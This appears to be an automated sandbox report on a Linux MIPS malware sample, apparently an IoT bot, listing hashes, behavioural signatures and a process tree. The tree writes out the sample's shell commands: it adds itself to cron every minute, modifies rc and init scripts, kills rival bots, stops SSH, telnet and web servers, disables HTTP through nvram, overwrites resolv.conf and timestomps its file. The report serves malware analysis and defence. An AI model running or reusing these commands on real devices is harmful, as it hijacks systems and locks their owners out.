Analysis
-
max time kernel
0s -
max time network
120s -
platform
linux_mipsel -
resource
debian9-mipsel-en-20211208 -
submitted
15-04-2022 01:07
Static task
static1
Behavioral task
behavioral1
Sample
728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
Resource
debian9-mipsel-en-20211208
General
-
Target
728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
-
Size
126KB
-
MD5
524f9d251746b069977fd621b2c5fd8f
-
SHA1
6932744f2893c0b1748a3dacc480f669d971af17
-
SHA256
728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
-
SHA512
71ae3066f2fb5bef87a2d0544abe8a5eeecdea6f15a7e39a0324bfbf4e0ff286206b63d89a32115af201272625f1748190cd376a5b5d345e41272d47458e4ea6
Malware Config
Signatures
-
Writes file to system bin folder 1 TTPs 5 IoCs
Processes:
728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848description ioc process /bin/nvram /bin/nvram 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /bin/cfgmtd /bin/cfgmtd 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /sbin/sncfg /sbin/sncfg 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /bin/crontab /bin/crontab 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /bin/uname /bin/uname 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 -
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Processes:
728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848description ioc process /etc/init.d/rcS /etc/init.d/rcS 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 -
Modifies rc script 1 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
Processes:
728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848description ioc process /etc/rc.d/rc.local /etc/rc.d/rc.local 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 -
Write file to user bin folder 1 TTPs 6 IoCs
Processes:
728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848serviceserviceservicedescription ioc process /usr/sbin/nvram /usr/sbin/nvram 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /usr/bin/compile_time /usr/bin/compile_time 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /usr/bin/crontab /usr/bin/crontab 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /usr/sbin/service /usr/sbin/service service /usr/sbin/service /usr/sbin/service service /usr/sbin/service /usr/sbin/service service -
Enumerates kernel/hardware configuration 1 TTPs 45 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctldescription ioc process /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl /sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus systemctl -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlcrontabsystemctlsystemctlsystemctldescription ioc process /proc/filesystems /proc/filesystems systemctl /proc/filesystems /proc/filesystems systemctl /proc/filesystems /proc/filesystems systemctl /proc/1/environ /proc/1/environ systemctl /proc/1/environ /proc/1/environ systemctl /proc/filesystems /proc/filesystems systemctl /proc/self/stat /proc/self/stat systemctl /proc/cmdline /proc/cmdline systemctl /proc/1/environ /proc/1/environ systemctl /proc/self/stat /proc/self/stat systemctl /proc/self/stat /proc/self/stat systemctl /proc/self/stat /proc/self/stat systemctl /proc/1/environ /proc/1/environ systemctl /proc/1/environ /proc/1/environ systemctl /proc/1/environ /proc/1/environ systemctl /proc/filesystems /proc/filesystems systemctl /proc/self/stat /proc/self/stat systemctl /proc/1/environ /proc/1/environ systemctl /proc/self/stat /proc/self/stat systemctl /proc/filesystems /proc/filesystems systemctl /proc/self/stat /proc/self/stat systemctl /proc/1/environ /proc/1/environ systemctl /proc/1/environ /proc/1/environ systemctl /proc/self/stat /proc/self/stat systemctl /proc/filesystems /proc/filesystems systemctl /proc/1/environ /proc/1/environ systemctl /proc/cmdline /proc/cmdline systemctl /proc/cmdline /proc/cmdline systemctl /proc/filesystems /proc/filesystems systemctl /proc/321/cmdline /proc/321/cmdline 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /proc/self/stat /proc/self/stat systemctl /proc/1/environ /proc/1/environ systemctl /proc/filesystems /proc/filesystems systemctl /proc/cmdline /proc/cmdline systemctl /proc/filesystems /proc/filesystems systemctl /proc/1/environ /proc/1/environ systemctl /proc/cmdline /proc/cmdline systemctl /proc/1/environ /proc/1/environ systemctl /proc/self/stat /proc/self/stat systemctl /proc/self/stat /proc/self/stat systemctl /proc/cmdline /proc/cmdline systemctl /proc/1/environ /proc/1/environ systemctl /proc/filesystems /proc/filesystems systemctl /proc/filesystems /proc/filesystems systemctl /proc/1/environ /proc/1/environ systemctl /proc/cmdline /proc/cmdline systemctl /proc/self/stat /proc/self/stat systemctl /proc/cmdline /proc/cmdline systemctl /proc/cmdline /proc/cmdline systemctl /proc/filesystems /proc/filesystems crontab /proc/cmdline /proc/cmdline systemctl /proc/filesystems /proc/filesystems systemctl /proc/cmdline /proc/cmdline systemctl /proc/filesystems /proc/filesystems systemctl /proc/self/stat /proc/self/stat systemctl /proc/cmdline /proc/cmdline systemctl /proc/cmdline /proc/cmdline systemctl /proc/self/stat /proc/self/stat systemctl /proc/filesystems /proc/filesystems systemctl /proc/self/stat /proc/self/stat systemctl /proc/1/environ /proc/1/environ systemctl /proc/filesystems /proc/filesystems systemctl /proc/1/environ /proc/1/environ systemctl /proc/cmdline /proc/cmdline systemctl -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes:
rmrmrmcat728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848rmrmrmrmdescription ioc process /tmp/tty3 /tmp/tty3 rm /tmp/tty4 /tmp/tty4 rm /tmp/tty6 /tmp/tty6 rm /tmp/.xs /tmp/.xs /tmp/.xs/*.pid /tmp/.xs/*.pid cat /tmp/toexec /tmp/toexec 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /tmp/tty1 /tmp/tty1 rm /tmp/tty2 /tmp/tty2 rm /tmp/tty5 /tmp/tty5 rm /tmp/.xs/* /tmp/.xs/* rm
Processes
-
./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd8481⤵
- Writes file to system bin folder
- Modifies init.d
- Modifies rc script
- Write file to user bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:327
-
/bin/shsh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"1⤵PID:328
-
/bin/rmrm -rf /var/run/wgsh2⤵PID:329
-
/bin/shsh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"1⤵PID:330
-
/bin/rmrm -rf /var/run/bbsh2⤵PID:331
-
/bin/shsh -c "rm -rf /var/run/tty1 > /dev/null 2>&1 &"1⤵PID:332
-
/bin/rmrm -rf /var/run/tty12⤵PID:333
-
/bin/shsh -c "rm -rf /var/run/tty2 > /dev/null 2>&1 &"1⤵PID:335
-
/bin/rmrm -rf /var/run/tty22⤵PID:336
-
/bin/shsh -c "rm -rf /var/run/tty3 > /dev/null 2>&1 &"1⤵PID:337
-
/bin/rmrm -rf /var/run/tty32⤵PID:341
-
/bin/shsh -c "rm -rf /var/run/tty4 > /dev/null 2>&1 &"1⤵PID:342
-
/bin/rmrm -rf /var/run/tty42⤵PID:343
-
/bin/shsh -c "rm -rf /var/run/tty5 > /dev/null 2>&1 &"1⤵PID:344
-
/bin/rmrm -rf /var/run/tty52⤵PID:345
-
/bin/shsh -c "rm -rf /var/run/tty6 > /dev/null 2>&1 &"1⤵PID:346
-
/bin/rmrm -rf /var/run/tty62⤵PID:347
-
/bin/shsh -c "rm -rf /tmp/tty1 > /dev/null 2>&1 &"1⤵PID:348
-
/bin/rmrm -rf /tmp/tty12⤵
- Writes file to tmp directory
PID:349
-
/bin/shsh -c "rm -rf /tmp/tty2 > /dev/null 2>&1 &"1⤵PID:350
-
/bin/rmrm -rf /tmp/tty22⤵
- Writes file to tmp directory
PID:351
-
/bin/shsh -c "rm -rf /tmp/tty3 > /dev/null 2>&1 &"1⤵PID:352
-
/bin/rmrm -rf /tmp/tty32⤵
- Writes file to tmp directory
PID:353
-
/bin/shsh -c "rm -rf /tmp/tty4 > /dev/null 2>&1 &"1⤵PID:354
-
/bin/rmrm -rf /tmp/tty42⤵
- Writes file to tmp directory
PID:355
-
/bin/shsh -c "rm -rf /tmp/tty5 > /dev/null 2>&1 &"1⤵PID:356
-
/bin/rmrm -rf /tmp/tty52⤵
- Writes file to tmp directory
PID:357
-
/bin/shsh -c "rm -rf /tmp/tty6 > /dev/null 2>&1 &"1⤵PID:358
-
/bin/rmrm -rf /tmp/tty62⤵
- Writes file to tmp directory
PID:359
-
/bin/shsh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"1⤵PID:360
-
/bin/rmrm -rf /var/run/pty2⤵PID:361
-
/bin/shsh -c "killall -9 arm > /dev/null 2>&1 &"1⤵PID:362
-
/bin/shsh -c "killall -9 mips > /dev/null 2>&1 &"1⤵PID:364
-
/bin/shsh -c "killall -9 mipsel > /dev/null 2>&1 &"1⤵PID:366
-
/bin/shsh -c "killall -9 powerpc > /dev/null 2>&1 &"1⤵PID:368
-
/bin/shsh -c "killall -9 ppc > /dev/null 2>&1 &"1⤵PID:370
-
/bin/shsh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"1⤵PID:372
-
/bin/shsh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"1⤵PID:374
-
/bin/shsh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"1⤵PID:376
-
/bin/shsh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"1⤵PID:378
-
/bin/shsh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"1⤵PID:380
-
/bin/shsh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"1⤵PID:382
-
/bin/rmrm -rf "/tmp/.xs/*"2⤵
- Writes file to tmp directory
PID:384
-
/bin/catcat "/tmp/.xs/*.pid"1⤵
- Writes file to tmp directory
PID:383
-
/bin/shsh -c "sleep 432000 && reboot &"1⤵PID:385
-
/bin/shsh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"1⤵PID:387
-
/bin/sleepsleep 4320001⤵PID:388
-
/bin/shsh -c "chmod 700 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 > /dev/null 2>&1 &"1⤵PID:390
-
/bin/chmodchmod 700 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd8482⤵PID:391
-
/bin/shsh -c "touch -acmr /bin/ls /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848"1⤵PID:392
-
/usr/bin/touchtouch -acmr /bin/ls /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd8482⤵PID:393
-
/bin/shsh -c "(crontab -l | grep -v \"/tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"1⤵PID:394
-
/bin/grepgrep -v "no cron"1⤵PID:398
-
/bin/grepgrep -v /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd8481⤵PID:397
-
/usr/bin/crontabcrontab -l1⤵
- Reads runtime system information
PID:396
-
/bin/grepgrep -v lesshts/run.sh1⤵PID:399
-
/bin/shsh -c "echo \"* * * * * /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 > /dev/null 2>&1 &\" >> /var/run/.x001804289383"1⤵PID:400
-
/bin/shsh -c "crontab /var/run/.x001804289383"1⤵PID:401
-
/usr/bin/crontabcrontab /var/run/.x0018042893832⤵PID:402
-
/bin/shsh -c "rm -rf /var/run/.x001804289383"1⤵PID:403
-
/bin/rmrm -rf /var/run/.x0018042893832⤵PID:404
-
/bin/shsh -c "/bin/uname -n"1⤵PID:405
-
/bin/uname/bin/uname -n2⤵PID:406
-
/bin/shsh -c "/bin/uname -n"1⤵PID:407
-
/bin/uname/bin/uname -n2⤵PID:408
-
/bin/shsh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"1⤵PID:412
-
/bin/shsh -c "service httpd stop > /dev/null 2>&1 &"1⤵PID:414
-
/usr/sbin/serviceservice httpd stop2⤵
- Write file to user bin folder
PID:416 -
/usr/bin/basenamebasename /usr/sbin/service3⤵PID:420
-
/usr/bin/basenamebasename /usr/sbin/service3⤵PID:423
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:428 -
/bin/systemctlsystemctl -p Triggers show dbus.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:454 -
/bin/systemctlsystemctl -p Triggers show ssh.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:461 -
/bin/systemctlsystemctl -p Triggers show syslog.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:464 -
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket3⤵
- Enumerates kernel/hardware configuration
PID:467 -
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:470 -
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:473 -
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:476 -
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:479 -
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket3⤵
- Enumerates kernel/hardware configuration
PID:482 -
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket3⤵
- Enumerates kernel/hardware configuration
PID:485 -
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:490 -
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:493 -
/usr/local/sbin/systemctlsystemctl stop httpd.service2⤵PID:416
-
/usr/local/bin/systemctlsystemctl stop httpd.service2⤵PID:416
-
/usr/sbin/systemctlsystemctl stop httpd.service2⤵PID:416
-
/usr/bin/systemctlsystemctl stop httpd.service2⤵PID:416
-
/sbin/systemctlsystemctl stop httpd.service2⤵PID:416
-
/bin/systemctlsystemctl stop httpd.service2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:416
-
/bin/catcat /var/run/httpd.pid1⤵PID:415
-
/bin/shsh -c "killall -9 mini_httpd > /dev/null 2>&1 &"1⤵PID:417
-
/bin/shsh -c "killall -9 minihttpd > /dev/null 2>&1 &"1⤵PID:419
-
/bin/shsh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"1⤵PID:422
-
/bin/shsh -c "nvram set httpd_enable=0 > /dev/null 2>&1"1⤵PID:425
-
/bin/catcat /var/run/thttpd.pid1⤵PID:426
-
/bin/shsh -c "nvram set http_enable=0 > /dev/null 2>&1"1⤵PID:427
-
/bin/shsh -c "killall -9 httpd > /dev/null 2>&1 &"1⤵PID:429
-
/bin/shsh -c "service telnetd stop > /dev/null 2>&1 &"1⤵PID:431
-
/usr/sbin/serviceservice telnetd stop2⤵
- Write file to user bin folder
PID:432 -
/usr/bin/basenamebasename /usr/sbin/service3⤵PID:439
-
/usr/bin/basenamebasename /usr/sbin/service3⤵PID:443
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:449 -
/bin/systemctlsystemctl -p Triggers show dbus.socket3⤵
- Enumerates kernel/hardware configuration
PID:462 -
/bin/systemctlsystemctl -p Triggers show ssh.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:465 -
/bin/systemctlsystemctl -p Triggers show syslog.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:468 -
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:471 -
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:474 -
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket3⤵
- Enumerates kernel/hardware configuration
PID:477 -
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:480 -
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:483 -
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:486 -
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:488 -
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:491 -
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:495 -
/usr/local/sbin/systemctlsystemctl stop telnetd.service2⤵PID:432
-
/usr/local/bin/systemctlsystemctl stop telnetd.service2⤵PID:432
-
/usr/sbin/systemctlsystemctl stop telnetd.service2⤵PID:432
-
/usr/bin/systemctlsystemctl stop telnetd.service2⤵PID:432
-
/sbin/systemctlsystemctl stop telnetd.service2⤵PID:432
-
/bin/systemctlsystemctl stop telnetd.service2⤵
- Enumerates kernel/hardware configuration
PID:432
-
/bin/shsh -c "service sshd stop > /dev/null 2>&1 &"1⤵PID:433
-
/usr/sbin/serviceservice sshd stop2⤵
- Write file to user bin folder
PID:437 -
/usr/bin/basenamebasename /usr/sbin/service3⤵PID:442
-
/usr/bin/basenamebasename /usr/sbin/service3⤵PID:446
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:450 -
/bin/systemctlsystemctl -p Triggers show dbus.socket3⤵
- Enumerates kernel/hardware configuration
PID:463 -
/bin/systemctlsystemctl -p Triggers show ssh.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:466 -
/bin/systemctlsystemctl -p Triggers show syslog.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:469 -
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:472 -
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:475 -
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:478 -
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:481 -
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:484 -
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:487 -
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:489 -
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:492 -
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:494 -
/usr/local/sbin/systemctlsystemctl stop sshd.service2⤵PID:437
-
/usr/local/bin/systemctlsystemctl stop sshd.service2⤵PID:437
-
/usr/sbin/systemctlsystemctl stop sshd.service2⤵PID:437
-
/usr/bin/systemctlsystemctl stop sshd.service2⤵PID:437
-
/sbin/systemctlsystemctl stop sshd.service2⤵PID:437
-
/bin/systemctlsystemctl stop sshd.service2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:437
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
- Enumerates kernel/hardware configuration
PID:435
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵PID:436
-
/bin/shsh -c "killall -9 telnetd > /dev/null 2>&1 &"1⤵PID:438
-
/bin/shsh -c "killall -9 utelnetd > /dev/null 2>&1 &"1⤵PID:441
-
/bin/shsh -c "killall -9 dropbear > /dev/null 2>&1 &"1⤵PID:445
-
/bin/shsh -c "killall -9 sshd > /dev/null 2>&1 &"1⤵PID:448
-
/bin/shsh -c "killall -9 lighttpd > /dev/null 2>&1 &"1⤵PID:452
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:456
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:458
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵PID:459
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵PID:460